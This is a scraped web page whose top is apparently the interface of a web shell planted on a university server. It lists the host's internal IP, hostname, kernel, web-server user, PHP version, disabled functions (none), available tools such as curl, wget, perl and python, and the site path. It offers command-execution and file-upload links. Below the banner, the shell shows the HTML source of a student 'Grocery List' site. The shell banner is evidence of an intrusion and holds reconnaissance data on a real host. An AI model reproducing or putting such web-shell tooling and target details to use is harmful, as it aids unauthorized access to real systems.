Server IP : 172.16.15.8 / Your IP : 18.117.106.23 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/ctirby/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<html> <title>Grocery List</title> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="stylesheet" href="https://www.w3schools.com/w3css/4/w3.css"> <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inconsolata"> <style> body, html { height: 100%; font-family: "Inconsolata", sans-serif; } .bgimg { background-position: center; background-size: cover; background-image: url("https://wallpapertag.com/wallpaper/full/a/a/3/615256-best-food-desktop-wallpaper-1920x1080-ios.jpg"); min-height: 100%; } .menu { display: none; } </style> <BODY> <p> <!-- Header with image --> <header class="bgimg w3-display-container w3-grayscale-min" id="home"> </header> <!-- Add a background color and large text to the whole page --> <div class="w3-sand w3-grayscale w3-large"> <!-- Links (sit on top) --> <div class="w3-top"> <div class="w3-row w3-padding w3-black"> <div class="w3-col s2"> <a href="Ghome.php" class="w3-button w3-block w3-black">HOME</a> </div> <div class="w3-col s2"> <a href="Gabout.php" class="w3-button w3-block w3-black">ABOUT</a> </div> <div class="w3-col s2"> <a href="Glogin.php" class="w3-button w3-block w3-black">LOGIN</a> </div> <div class="w3-col s2"> <a href="Gsignup.php" class="w3-button w3-block w3-black">SIGN UP</A> </div> </div> </div> </BODY>